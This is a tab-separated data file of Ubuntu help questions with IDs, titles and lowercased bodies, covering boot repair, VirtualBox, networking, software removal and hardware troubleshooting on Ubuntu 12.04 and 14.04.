510000	how to resize the screen image of my graphic card	i have just installed ubuntu 14.04 lts and i need to configure de screen size , my graphic card is an evga gtx550ti , in order to fit the screen , is not fitting
510001	error while updating to 14.04 lts	i have an ubuntu 12.04 virtual machine that i was intending on updating to 14.04 lts . whilst in the process , the update complained about lack of disk space in `` / '' . i searched around for a fix of this and found that i was able to free up considerable disk space using advice from this link : not enough free disk space . as per the top advice , i decided to use apt-get purge on all previous kernel versions minus the latest and ( latest-1 ) versions . after i restarted the vm , it took me into gnu grub to ask for which version to start in ( it usually never did that ) and it leaves me 4 choices , 2 for ubuntu 3.2.0-67 & recovery and 2 for memory tests . any of these choices now just return the following : error : file not found . error : you need to load the kernel first . i basically can not get back into the os . have i lost my vm by accidentally deleting too many images ? any way to recover ?
510003	cut-n-paste problem	i am using vm player 6.0.3 , ubuntu 12.04-64 bit on win8.1 ( 64 bit ) host . the cut-n-paste functionality between guest and host mostly does not work ( but sometimes it does ) . it does not matter what the host application or the guest target application - it is totally random . ca n't figure out the pattern when it stops working - but totally restarting the machine mostly helps what configuration or whatever i could do to solve this issue . i am totally stuck . thx sam
510004	how to get acces to a partition disc	there is no other os along ubuntu . i just made one partition with ubuntu os and another to put files on . i try to write from an external disc my saved information and it says that i have no permission to do so . how can i use the partition part ?
510005	bookmarks , places nautilus sidebar position ubuntu 14.04	12.04 shows my bookmarks at the top of the side panel . after upgrading to 14.04 it shows places , devices , bookmarks , network . is there any way to move bookmarks top of the side panel or set position for these items ?
510006	citrix receiver on lubuntu 14.04 32-bit	i see that citrix receiver is currently available for ubuntu 13.10 , and there are threads about installing it on ubuntu 14.04 64-bit . is there any way to install it on lubuntu 14.04 32-bit ?
510009	does the ubuntu kernel have efi stub loader boot support ?	this question is regarding efistub booting . i would like load the stock pre-compiled ubuntu kernel directly from uefi firmware its boot menu , using efiboogmgr . since which ubuntu version can this be done without the need for a separate bootloader ?
510011	how can i exclude specific folders from thumbnail generation ?	so i have a folder i would like nautilus to skip generating thumbnails for because there are too many files and too many changes to it . i saw that we can disable thumbnails for a specific filetype but what about a folder ?
510014	is there a gui program for editing midi files on ubuntu ?	are there any gui programs available on ubuntu that can be used to edit midi files ?
510018	setting up an ubuntu server 14.04 firewall . can it protect multiple pc 's on a local network ?	i am new to ubuntu firewalls . i would like to setup an ubuntu firewall on computer # 1 it can be connected wirelessly or by ethernet . i have another ubuntu server running on computer # 2 and windows 7 on computer # 3 . both computers # 2 and # 3 are connected to the network by ethernet . is it possible to run incoming/outgoing connections from computers # 2 and # 3 through the ubuntu firewall on computer # 1 ?
510019	google chrome no longer opens after 14.04 update	i just updated to 14.04 today , and when i restarted my computer i got a few `` report a problem '' messages . i did n't think too much of them until i tried to open google chrome from the launcher , and it wont open anymore . i do n't know if it 's because of the update or not , so if anyone can help me out that would be great
510024	what are the steps needed to create new keyboard layout on ubuntu ?	the keyboard i am trying to create has a lot of unicode and looks like this : being unsuccessful with the following tutorial : https : //help.ubuntu.com/community/howto % 3a % 20custom % 20keyboard % 20layout % 20definitions ( there are a few errors in the tutorial , and it uses imprecise language such as `` cutting '' things instead of `` deleting '' them , and it is formatted strangely ) i was wondering if anybody would be so kind to provide a better tutorial with step by step instructions ?
510025	ubuntu 14.04 lts network manager overwrites static network interface	i spent far too long figuring this out , and wanted to share . simple task : add a static ip address to the 2nd of 4 nics on my server . to start , i followed the instructions here under static ip address assignment : https : //help.ubuntu.com/14.04/serverguide/network-configuration.html interfaces file : $ cat /etc/network/interfaces # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto em1 iface em1 inet dhcp auto em2 iface em2 inet static address 172.24.0.9 netmask 255.255.0.0 then i run sudo ifup em2 , as per the instructions . at first , it appeared to work . ifconfig showed the interface properly , and i was able to ping devices on the network . however , after about a minute or so , the assigned static ip address vanished . the address is lost and the machine is unreachable . this happens over and over no matter how often i bring the interface up or down . why is this happening ?
510027	how can i connect to airport extreme shared drive upon login ?	i 'm new to ubuntu but i have successfully used the `` connect to server '' menu option in the places window to connect to my external usb drive , which is shared on my airport extreme . i use the ip address and it lets me right in , no problem . i would like to be able to have this drive always available to me rather than having to run the `` connect to server '' option all the time . i have been unable to get it working . i have seen a few tutorials but none seem to work in 14.04 .
510028	ubunt 12.04 lts touch pad no longer working after connecting usb mouse	i have a toshiba satellite c55 which is configured as a dual boot ( windows 8/ ubuntu 12.04 lts ) recently i connected a usb mouse and since the touch pad on the laptop has stopped working with or with out the usb mouse . the two buttons are working . i have referenced a following post but have not been able to find a solution . any help is greatly appreciated . referances lenovo t440s deactivate touch pad but keep mouse button function working ? non functioning of touch pad & mouse ubuntu 12.04 - touchpad not working
510029	vlc color problem in ubuntu 14.04 lts	i 've got this color issue on my vlc player in ubuntu 14.04 . unlike other reported color problems on vlc , colors are unevenly messed up on the screen . the attached pictures show how the lower left of the screen is stamped by ( a yellowed version of ) the end of a previous video i watched since i launched my computer , the end credits of run lola run . in the top right hand part of the screen , the yellow is offset to the left . i 've been having this problem for a while , and it happens about 2 times out of 3 . how may i solve this ? .
510031	ubuntu 12.4.4 not connecting to wifi or lan on a dell vostro 1000	ubuntu 12.4.4 not connecting to wifi or lan on a dell vostro 1000 . i know it 's been asked before but nothing is working . when i run parted magic it works please help
510033	similar download manager in chrome to that in firefox ?	in firefox , i am using a download manager which can resume downloading if it breaks because of bad connection , and can automatically download multiple selected links in a webpage . i tried some extensions in chrome , but none has the above abilities . i wonder what chrome extensions can do the above two ?
510034	function key to lock special function keys in f1 - f12 does not work	i have a function key ( used by pressing fn ) on my esc key . it locks all function keys on f1-f12 . it does not seem to work on ubuntu 14.04 . any suggestions ?
510035	how to set up grub after 14.04 and windows 8.1 are installed ?	i have installed ubuntu x64 bit on my toshiba satellite laptop . if i turn off the uefi boot and change to csm boot , ubuntu will load . if not , windows loads like normal which is fine . my other problem is that i can not get the option to choose which operating system i want to load . this is what is bothering me the most . i have ran the command prompt as an admin and ran the bcdedit /set `` { bootmgr } '' path \efi\ubuntu\grubx64.efi command . anyone have any suggestions ? i 'd greatly appreciate it . ps i use malwarebytes and windows defender as anti-virus on windows . is there anything i should use for ubuntu ? also when i switch from uefi to csm , my clock time moves 5 hours forward . please comment below for these issues .
510037	how do i recompile a kernel module and insert it into the running kernel ?	how do i recompile one specific kernel module ( ib_ipoib ) and enabling config_infiniband_ipoib_debug and then unloading and inserting the debug version into the running kernel ? is this possible ?
510039	how do i reinstall vpn from windows 8 ?	i have vpn private internet access ; i saved it onto my hard drive when switching from windows to ubuntu 14.04 . the file is vpninstallerwin.exe . i downloaded wine and have set up the configuration for windows 8 which is what i was using . now when i click on vpn installer it goes straight to terminal with a blank screen and i cant type any commands in . how do i solve this issue ?
510041	how ubuntu charge for every software which we purchase	i recently installed minitube from ubuntu software center . it prompts for my email id and other details . how ubuntu will be get paid for each software which we purchase . does it send bill to my email id ? or i have to enter my credit card details when purchasing .
510045	how do i safely delete a program in ubuntu ?	i just installed 'sublime text 3 ' and for some reason i ca n't install the 'package manager ' . anyway , i want to try uninstall it but i ca n't find it in my 'ubuntu software center ' . on this page it says to type this into the command line : sudo rm -r /opt/sublime\ text\ 2 sudo rm /usr/bin/sublime sudo rm /usr/share/applications/sublime.desktop sudo sed -i 's/sublime\.desktop/gedit.desktop/g ' /usr/share/applications/defaults.list on this page it says to install synaptic and from there install and remove packages . or to to delete it with : sudo apt-get remove -- purge < package-name > on this page it says to use : sudo apt-get remove sublime-text-installer if i installed it with ( which i did n't but i want to understand this in general ) : sudo add-apt-repository ppa : webupd8team/sublime-text-3 sudo apt-get update sudo apt-get install sublime-text-installer it also says that if i installed it through 'ubuntu software center ' or through running : sudo dpkg -i sublime-text_build-3047_amd64.deb then i should remove it by running : sudo dpkg -r sublime-text can i always run 'sudo dpkg -r programx ' from anywhere in my terminal to remove a program i installed with 'ubuntu sofware center ' or with 'sudo dpkg programx.deb ' ? which method should i use to make sure a program is completely deleted ? the first instructions make me a bit scared that it is installed all over the place . why does n't all installed software come up in 'ubuntu software center ' ? is there not one place where i can delete a program like in windows ' add/remove programs ? what do i need to know about installing and uninstalling programs in ubuntu ( 14.04 ) ?
510047	error while opening software center	while opening the software centre i am getting the below error . 2014-08-11 21:57:11,945 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2014-08-11 21:57:12,309 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2014-08-11 21:57:12,311 - softwarecenter.plugin - info - activating plugin ' < module 'webapps_activation ' from '/usr/share/software-center/softwarecenter/plugins/webapps_activation.pyc ' > ' 2014-08-11 21:57:12,316 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2014-08-11 21:57:12,316 - root - error - could not find any typelib for launchpadintegration 2014-08-11 21:57:12,366 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 261 , in open self._cache = apt.cache ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 107 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 155 , in open self._list.read_main_list ( ) systemerror : e : tipo « < ! doctype» desconocido en la línea 1 de lista de fuentes /etc/apt/sources.list.d/playonlinux.list 2014-08-11 21:57:12,765 - softwarecenter.backend.reviews - warning - error creating bsddb : ' ( 22 , 'argumento inv\xc3\xa1lido -- bdb0054 illegal flag combination specified to db_env- > open ' ) ' ( corrupted ? ) 2014-08-11 21:57:12,766 - softwarecenter.backend.reviews - error - trying to repair db failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/backend/reviews/__init__.py '' , line 358 , in _save_review_stats_cache_blocking self._dump_bsddbm_for_unity ( outfile , outdir ) file `` /usr/share/software-center/softwarecenter/backend/reviews/__init__.py '' , line 377 , in _dump_bsddbm_for_unity 0600 ) dbinvalidargerror : ( 22 , 'argumento inv\xc3\xa1lido -- bdb0054 illegal flag combination specified to db_env- > open ' ) /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py:190 : warning : source id 68 was not found when attempting to remove it gtk.main_iteration ( ) 2014-08-11 21:57:13,159 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 281 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 183 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1378 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1316 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 150 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 227 , in init_view self.cache , self.db , self.icons , self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 80 , in __init__ self.build ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 326 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 121 , in _build_homepage_view self._append_whats_new ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 255 , in _append_whats_new whats_new_cat = self._update_whats_new_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/lobbyview.py '' , line 240 , in _update_whats_new_content docs = whats_new_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 131 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 330 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 225 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 281 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' esteban @ olympicasus : ~ $
510049	recovering firefox 's saved login details	i 'm trying to log in as admin to a joomla site of mine . i was really lazy and always relied on firefox to remember my login info . i 've recently had to replace the hard drive in my laptop . i bought an usb drive adaptor and manager to save all my music and files that were n't backed up after a week of transfer time . i 'm wondering if i can do the same thing with passwords and usernames that firefox stores when you tell it to remember a password ? if so , how exactly would i do it ?
510052	how do you get rosegarden to play sound when playing a midi in it ?	how do you get rosegarden to play sound when playing a midi in it ? do i need jack running ?
510053	is my ubuntu installation corrupt ?	i just messed everything up so badly on my computer after i downloaded ubuntu and deleted windows off the hard drive . now i can only turn the computer on and come to the log on screen , then when i log on bam i get a message that it has failed to do so . i have a feeling that some files are corrupt and since i have not been ever to use ubuntu on the computer , i decided it would be best to simply reinstall ubuntu . but how ? the computer is an old one and i have found tutorials for reinstalling ubuntu while the computer is working , but what if its not ?
510056	how to install google chrome on ubuntu 14.04 ?	how do you install google chrome on ubuntu 14.04 ?
510060	wubi installation program for 14.04 reported a `` permission denied '' error	i downloaded ubuntu-14.04.1-desktop-amd64 and followed instructions to install onto my pc with 4gb ram and 114 gb free disk space running wins 7 professional . after i ran the wubi.exe installation program , it reported an permission denied error and i could n't find the log file in : c : \users\00013851\appdata\local\temp\wubi-14.04-rev286.log there 's no such directory path . i have tried the 32-bit version but faced the same error .
510061	ubuntu 14.04 freeze i/o error	i have installed ubuntu 14.04 and i have been getting periodic system hangups and freezes . when i press f1 it will display i/o errors and sometimes display `` failed command : read fpdma queued . '' what usually happens next is that i am unable to use the gui or type in commands in terminal . the only solution is to use reisub to restart . i am dual booting with windows 7 using the same hdd and i have no problems with it . i have scanned the drive using gsmartcontrol and it shows no errors in extended self-tests or any other test type . i have also applied updates , changed drivers , and reinstalled twice ( one was mint 17 ) . i have formatted the partition and scanned it using windows and no errors came up . i am unsure what to do in order to solve this . if my drive is failing , then why am i getting no errors when i scan it ? also why does windows 7 work flawlessly on it ?
510064	yellow line on the screen	i installed ubuntu-gnome on my laptop , which is having amd apu 3420m . after some time of normal usage , when a day i am watching movies using default video player of gnome , a yellow horizontal line appear on screen . it is not vanishing even after restarting computer . sometimes it disappears while playing video or flash games . i am using open source xorg drivers .
510065	dual boot problems after routine upgrade ( all the usual solutions tried and failed )	i 'm running ubuntu 12.04 with windows 7 . grub dual boot worked perfectly until i ran apt-get update . since the update it does not . grub defaults to the mem test when i run customize-grub , the first entry is my linux /boot/vmlinuz-3.11.10-991-generic , and is highlighted . i 've saved this configuration and saved it to my mbr , but still grub defaults to the memory test . grub does n't see windows i 've followed instructions on the web : os-prober found windows as it should have , but update-grub did not . i ran boot-repair and followed instructions , the last of which was apt-get purge -y -- force-yes grub* shim-signed but this returned a no match . can anybody suggest how to get my windows back and how to default to a linux boot ? # fdisk -l disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x1796a6c6 device boot start end blocks id system /dev/sda1 63 80324 40131 de dell utility partition 1 does not start on physical sector boundary . /dev/sda2 81920 1617919 768000 7 hpfs/ntfs/exfat /dev/sda3 * 1617920 741703679 370042880 7 hpfs/ntfs/exfat /dev/sda4 741703680 1465147391 361721856 5 extended /dev/sda5 741705728 766871551 12582912 82 linux swap / solaris /dev/sda6 766873600 913674239 73400320 83 linux /dev/sda7 913676288 1465147391 275735552 83 linux # os-prober /dev/sda2 : windows 7 ( loader ) : windows : chain /dev/sda3 : windows 7 ( loader ) : windows1 : chain # update-grub generating grub.cfg ... warning : setting grub_timeout to a non-zero value when grub_hidden_timeout is set is no longer supported . using custom appearance settings found background image : /home/leo/photos/yosemite_june09/img_1556.jpg found linux image : /boot/vmlinuz-3.11.10-991-generic found initrd image : /boot/initrd.img-3.11.10-991-generic found linux image : /boot/vmlinuz-3.4.0-030400-generic found initrd image : /boot/initrd.img-3.4.0-030400-generic found linux image : /boot/vmlinuz-3.2.0-56-generic found initrd image : /boot/initrd.img-3.2.0-56-generic found linux image : /boot/vmlinuz-3.2.0-48-generic found initrd image : /boot/initrd.img-3.2.0-48-generic found linux image : /boot/vmlinuz-3.2.0-33-generic found initrd image : /boot/initrd.img-3.2.0-33-generic found linux image : /boot/vmlinuz-3.2.0-32-generic found initrd image : /boot/initrd.img-3.2.0-32-generic found linux image : /boot/vmlinuz-3.2.0-23-generic found initrd image : /boot/initrd.img-3.2.0-23-generic found memtest86+ image : /boot/memtest86+.bin found linux image : /boot/vmlinuz-3.11.10-991-generic found initrd image : /boot/initrd.img-3.11.10-991-generic found linux image : /boot/vmlinuz-3.4.0-030400-generic found initrd image : /boot/initrd.img-3.4.0-030400-generic found linux image : /boot/vmlinuz-3.2.0-56-generic found initrd image : /boot/initrd.img-3.2.0-56-generic found linux image : /boot/vmlinuz-3.2.0-48-generic found initrd image : /boot/initrd.img-3.2.0-48-generic found linux image : /boot/vmlinuz-3.2.0-33-generic found initrd image : /boot/initrd.img-3.2.0-33-generic found linux image : /boot/vmlinuz-3.2.0-32-generic
510066	while booting ubuntu 14.04 , starting cmain ( ) .. , then stoped at grub4dos	i was using ubuntu 12.04 alongside windows 7 with window 's bootloader as primary ( using easybcd ) and it was working fine for hp pavilion dv4 . but after installing ubuntu 14.04 through pop-up update manager ( new version available ) , and while trying booting into ubuntu 14.04 , it displays msg as starting cmain ( ) ... , then grub4dos just starts . i used there boot command but it asked kernel must be loaded . please suggest me how should i proceed to successfully boot ubuntu 14.04 ( as similar to ubuntu 12.04 ) .
510067	how to preload driver before ubuntu 14.04 installation ?	i have a raid card : lsi 9311-8i . i want to install os on raidcard , but original ubuntu 14.04 does not include mpt3sas driver , so it can not detect the raid volume . how to make ubuntu detect the volume ? i tried used red hat 6.4 , as in it one can used command dd to preload the driver image successfully . but that method is not suitable for ubuntu 14.04 . so how do i solve it ?
510069	boot-repair in win8.1/ubuntu not working ( load windows with no grub )	i just installed ubuntu as secondary os . i can chose ubuntu from the restart ( shift key pressed ) on windows and boot to ubuntu , but if i choose just restart the grub does n't appear . i did the boot-repair method 3 times , but still loading windows without showing grub . http : //paste.ubuntu.com/8021894/
510071	runnning subpackages of python-3.4 astropy-0.3 library on ubuntu 14.04	i have successfully installed astropy-0.3 with python-3.4 on ubuntu-14.04 but whenever i search any conventional library of astropy like cosmology , time , units it does n't work here.. is this library specifically made for windows or any thing else ? i am using astropy library on idle python-2.7 conveniently in windows 7 . any help regarding this issue ? ?
510072	how to get administrator rights ?	i am the administrator and only user of my laptop with a new installation of 14.04 . i created a bootable usb and when it is used i find this file `` prj_20071023 '' that i can not read or delete . i get a message that i do not have permission to access or delete the file . how can i get around this limitation . although i have an administrator account , i appear to have no administrator rights . any help you can offer will be greatly appreciated .
510074	how can i ssh to remote server through vpn , running on a vm ?	i have an ubuntu vm that is connected to a vpn ( using openconnect on ubuntu ) , and i want to ssh from my os x host to the vpn through ubuntu : ( osx_host ) -- ssh -- > ( ubuntu_vm ) -- ssh -- > ( remote_server_on_vpn ) i 've tried using ssh port forwarding with the commands below to forward ubuntu 's port 9922 to the remote server 's port 22 such that ssh'ing to ubuntu 's port 9922 would connect to the remote server , but i 'm getting unexpected results . trial 1 osx_host $ ssh -r 9922 : remote_server_on_vpn:22 ubuntu_vm osx_host $ ssh localhost -p 9922 trial 2 ubuntu_vm $ ssh -l 9922 : remote_server_on_vpn:22 localhost osx_host $ ssh ubuntu_vm -p 9922 but these only open a shell to ubuntu and not the remote server . trial 3 ubuntu_vm $ ssh -d localhost:9922 remote_server_on_vpn osx_host $ ssh ubuntu_vm -p 9922 but the connection to port 9922 times out . i 've already verified that my /etc/ssh/sshd_config contains allowtcpforwarding yes and rebooted . what am i doing wrong ?
510076	how to install ubuntu on an asus vivopc vm60 ?	i recently tried installing ubuntu 14.04 on a new asus vivopc vm60 and it did n't work . the grub loader would abort with the message : drm_kms_helper : panic occured ... i was n't able to find any direct help regarding this so i thought i would post my solutions here .
510077	file sharing ubuntu desktop 14.04 & osx mavericks	trying to set up file share between ubuntu desktop & osx mavericks - have had massive issues so far due to my naivete . the ubuntu desktop machine will act as a server to a macbook pro & raspberry pi . configuration for the pi has been straightforward . here are the specs for each system : ubuntu machine ubuntu desktop os 2 drives os ( 128gb san disk ssd ) & storage ( 2tb seagate hdd ) ssd is automatically partitioned as /dev/sda1 ( fat32 512mb ) , sda2 ( ext4 115gb ) and /sda3 ( unknown 3.8gb ) hdd is partitioned as fat23 with 1.82tb macbook pro osx mavericks ( 10.9.4 ) 500gb internal hdd running mac os extended ( journaled ) file format q1 ) what is the recommended formatting for the ubuntu hdd & the mac ? i 've attempted to format the seagate hdd to hfs+ to work with the mac , but gparted formatting editor has continually came back as failed . q2 ) what would be the best file sharing protocol for ubuntu 14.04 & osx mavericks ? i.e . afp , smb , ftp ?
510078	multi-seat on laptop	i know very well this may be a duplicate but i 'm going to risk it . i have a blazing fast ubuntu laptop with a lot of usb ports and i want to run multi-seat on it . the problem is , i only have one graphics card ( it 's a laptop ) . according to a bit of googling , many people say this is n't possible on ubuntu . i just want to confirm if this is true , because i really need multiseat . if it is possible , can you give me a link or instructions how to get started ? i only need two screens and the laptop already has one , so i think the included hdmi port is enough .
510080	dvd-rom drive on my thinkpad t41- is really really loud is there a way to fix this or should i get a new one ?	after looking online i found that people have had the same problem and it can be fixed through going into the windows power management settings ( though i could n't really find what to do when i 'm there . ) is there a way to fix this in ubuntu ? i bought the laptop used and everything else on it has been working great .
510086	virtualbox usb device error ns_error_failure ( 0x80004005 ) on ubuntu 14.04 x64 virtualbox 4.3	i have been trying to connect my new boogie board sync to a virtualbox 4.3 virtual machine running on an ubuntu 14.04 host . i keep running into this ns_error_failure ( 0x80004005 ) and have not been able to resolve it , despite trying it a number of different ways . note i did look up a few different existing posts , but they did not help . the issues are different than the one that i am running into and the software versions are different too . but here are the ones i looked at . virtualbox does not run : ns_error_failure what is holding my usb device when i try to use it in virtualbox ? the error message i get says failed to attach the usb device improv electronics sync [ 0120 ] to the virtual machine ie11 - win8.1_1 . failed to create a proxy device for the usb device . ( error : verr_read_error ) . the message details indicate result code : ns_error_failure ( 0x80004005 ) component : console interface : iconsole { 8ab7c520-2442-4b66-8d74-4ff1e195d2b6 } note i am using the windows 8.1 virtual machine from microsoft , but i do n't believe that makes any difference . things i have tried : enabled usb controller on the virtualbox manager with the ehci controller . tried enabled usb controller without the ehci controller . tried to rebuild the virtualbox image from scratch . added myself to the vboxusers group . none of this has seemed to work . any suggestions ?
510087	gparted not resizing partitions & i 'm unable to access ubuntu 14.04 install	i 'm trying to resize my partitions , to increase the area for my install of ubuntu 14.04 . i 'd like to regain use of that partition , which i was unable to get back into after doing a fresh install of windows xp on another partition . i 'm currently using ubuntu trial via a boot repair usb . i unswapped the linux-swap so i could move the partitions , but gparted comes back with error messages each time i try to resize something . ( i ca n't use a screenshot because i lack enough of a reputation here to upload images . ) in gparted the partitions are : /dev/sda , 1ntfs , 9.77gb ( 3.7gb used ) ; unallocated , 34.93gb ; /dev/sda2 , extended , 29.83gb ; /dev/sda5 , ext4 , 27.83gb ( 11.8gb used ) ; /dev/sda6 , linux-swap , 2gb . i assume the ntfs part is my windows xp reinstall and the ext4 part is my ubuntu 14.04 install . i 've been reading through answers here and on gparted but am not getting anywhere . backstory : i had windows xp but it stopped working , then i installed ubuntu 14.04 alongside it ( which has been behaving in faulty ways , not loading properly etc ) . i re-installed windows xp on a reduced partition of ~10gb . since the win reinstall i 'm unable to start the ubuntu os , so am using ubuntu via the trial option on a boot repair usb ... my files are backed up . ( i 'm on a dell latitude 640m laptop . ) this is the error message when i tried to expand the extended ( empty , 29.83gb ) partition into the unallocated partition ( this was too long to be allowed in a comment ) . note that there are no lock keys anywhere and everything is unmounted etc : gparted 0.12.1 -- enable-libparted-dmraid libparted 2.3 move /dev/sda2 to the left and grow it from 29.83 gib to 64.76 gib 00:00:00 ( error ) calibrate /dev/sda2 00:00:00 ( success ) path : /dev/sda2 start : 93,745,150 end : 156,301,311 size : 62,556,162 ( 29.83 gib ) move partition to the left and grow it from 29.83 gib to 64.76 gib 00:00:00 ( error ) old start : 93,745,150 old end : 156,301,311 old size : 62,556,162 ( 29.83 gib ) requested start : 20,484,096 requested end : 156,299,263 requested size : 135,815,168 ( 64.76 gib ) libparted messages ( info ) unable to satisfy all constraints on the partition . ca n't have overlapping partitions . ========================================
510088	how can i record audio in & mic in as 1 channel in audacity ?	i am trying to record my podcast , which i do using google hangouts & audacity . i recently switched from windows 8.1 to ubuntu . in windows i was using the software virtual cable ( http : //vb-audio.pagesperso-orange.fr/cable/virtualcables.htm ) + voicemeeter ( http : //vb-audio.pagesperso-orange.fr/voicemeeter/index.htm ) to mix my microphone in & audio in from google hangouts into a single channel on the virtual cable which i would then record in audacity . this worked great , but i can not find any sort of similar setup for ubuntu . i 'm sure i 'm either overlooking something and/or still do n't quite understand alsa/pulse audio . any advice or suggestions is greatly appreciated !
510090	how to remove 'sublime text 3 ' from ubuntu 14.04 ; installed with the instructions on http : //www.sublimetext.com/3 ?	there is a question for how to remove sublime from ubuntu 12.04 . but i 'm a bit too scared to run the commands since it only says 'sublime ' and the 12.04 version of ubuntu is specified . i just installed 'sublime text 3 ' by clicking on the ubuntu 64 bit and then install from 'ubuntu software center ' . i want to uninstall it but now i ca n't find it in my 'ubuntu software center ' . i do n't think it is in my history ( based on the time stamps ) but does anyone know what 'sublime text 3 ' is called in this list ( just in case ) ? on this page it says to type this into the command line : sudo rm -r /opt/sublime\ text\ 2 sudo rm /usr/bin/sublime sudo rm /usr/share/applications/sublime.desktop sudo sed -i 's/sublime\.desktop/gedit.desktop/g ' /usr/share/applications/defaults.list on this page it says to install synaptic and from there install and remove packages . or to to delete it with : sudo apt-get remove -- purge < package-name > on this it says that if i installed it through 'ubuntu software center ' or through running : sudo dpkg -i sublime-text_build-3047_amd64.deb then i should remove it by running : sudo dpkg -r sublime-text which method should i use to make sure it is completely deleted from ubuntu 14.04 ? ( the first instructions make me a bit scared that it is installed all over the place . )
510091	ftp to my ubuntu machine kills my network	i 'm having a problem transferring files between my ubuntu server and other machines with ftp . basically , if i initiate an ftp request from my ubuntu to my mac , it works fine . but if i make a request from my mac to my ubuntu machine , the entire lan crashes , and i have to reboot the router to fix it . i have experimented with what triggers this . ftp from my ubuntu to other machines works . ftp from my mac to other machines works . but any ftp request to my ubuntu from any machine crashes the network . to sum it up , if my ubuntu receives an ftp request , my network dies , but it can initiate them just fine . even more , if i make a git pull request from my ubuntu repo , the network crashes . but ubuntu can push/pull just fine to/from my mac . i 've already been told this is likely a router issue , and i 'm fine with accepting that . however , it 's just odd that the issue surrounds my ubuntu , and only when receiving ftp connections . so i 'm asking if there is something that could be wrong with the machine , instead of the router . i have even upgraded to ubuntu 14.04.1 to see if there was some outdated package , but the problem persists . i 'm completely at a loss with what detail specs to offer , so if any other info is need , let me know . i am using a linksys e2500 router . it 's about a year old , and i 've never had issues with these routers before . update : after some more tinkering , i realized that ftp works fine . sftp is what is crashing my network . i have openssh-server installed already , so i 'm wondering if there is some other package that needs to be setup to allow the ubuntu server to receive sftp connections . since this problem appears not to match the original stated , i made a new thread : sftp to local ubuntu server crashes network
510094	binding keys to buttons on a ps3 gamepad controller	i have both a dual shock 3 and a knock off wired ps3 controller . i 'm running 14.04 trusty tahr on a presario cq57 from compaq , no windows installed . i have a amd c-50 processor ă 2 , 1.6 gib of memory . i have been looking all over the internet for how to make it work with something like tf2 and/or minecraft pc version . there is plenty of documentation about xbox drivers and all sorts of programs which can bind the buttons to keyboard keys but as i have searched and tried different things none of it makes sense to me . i am new to ubuntu so i need a step by step process of how to get a program to bind various keys to various buttons on a ps3 controller . simple files which i can open up with software center would be nice or instructions on how to do it from terminal .
510097	ubuntu to w8 boot failure : no default or ui configuration directive found !	i made a liveusb on ubuntu 14.04 . i am trying to boot windows 8 from a flash drive and i get this message . i see the conversion for the linux . is there one for the windows ?
510099	copy of ubuntu os from one system to another	i have installed os ubuntu 14.04 and windows 7 os in my laptop which is running well . i have also installed many packages and application in my ubuntu os . now i am planning to install ubuntu on my desktop which have windows xp . is there any way to copy my ubuntu 14.04 from my laptop to desktop ( without causing any harm to windows xp ) so that i can avoid installing packages and application to ubuntu .
510102	ubuntu 14.04 refuses to install alongside windows	trying to install dual boot windows 7 and ubuntu 14.04 . i 've followed all the instructions but ubuntu 14.04 will not see any other partitions , not even the ext3 partition that i created in advance for it . this is on a lenovo t520 with a 240g ssd.i 've been dual booting ubuntu with windows over 10 years now and have never encountered a ubuntu build that would not recognize windows or any other partition on install.please advise . tia , wally
510103	speaker not working	my laptop speaker are not working since i had install ubuntu 12.04 ( hp-pavilion-14 ) . it 's working fine in windows . i searched whether the speaker are muted , but it 's not . volume is all the way high . so can anybody please give me some solution .
